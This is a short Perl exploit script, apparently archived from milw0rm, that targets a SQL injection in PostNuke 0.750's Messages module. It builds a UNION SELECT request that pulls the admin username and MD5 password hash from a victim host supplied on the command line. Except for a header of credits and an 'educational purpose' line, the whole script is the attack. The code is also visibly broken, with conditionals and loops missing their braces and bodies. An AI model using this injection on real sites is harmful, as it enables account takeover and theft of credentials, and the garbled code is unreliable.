# This tools is only for educational purpose
# K-C0d3r a x0n3-h4ck friend !!!
# This exploit should give admin nick and md5 password
#-=[ PostNuke SQL Injection version : x=> 0.750]=-
#-=[ ]=-
#-=[ Discovered by sp3x ]=-
#-=[ Coded by K-C0d3r ]=-
#-=[ irc.xoned.net #x0n3-h4ck to find me K-c0d3r[at]x0n3-h4ck.org]=-
# Greetz to mZ, 2b TUBE, off, rikky, milw0rm, str0ke
# !!! NOW IS PUBLIC (6-6-2005) !!!
use IO::Socket;
sub Usage {
print STDERR "Usage: KCpnuke-xpl.pl <www.victim.com> </path/to/modules.php>\n";
if (@ARGV < 2)
if (@ARGV > 2)
if (@ARGV == 2)
$host = @ARGV[0];
$path = @ARGV[1];
print "[K-C0d3r] PostNuke SQL Injection [x0n3-h4ck]\n";
print "[+] Connecting to $host\n";
$injection = "$host\/$path?";
$injection .= "op=modload&name=Messages&file=readpmsg&start=0";
$injection .= "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
$injection .= "%20FROM%20pn_users%20WHERE%20pn_uid=2\/*&total_messages=1";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
print $_;
# milw0rm.com [2005-06-05]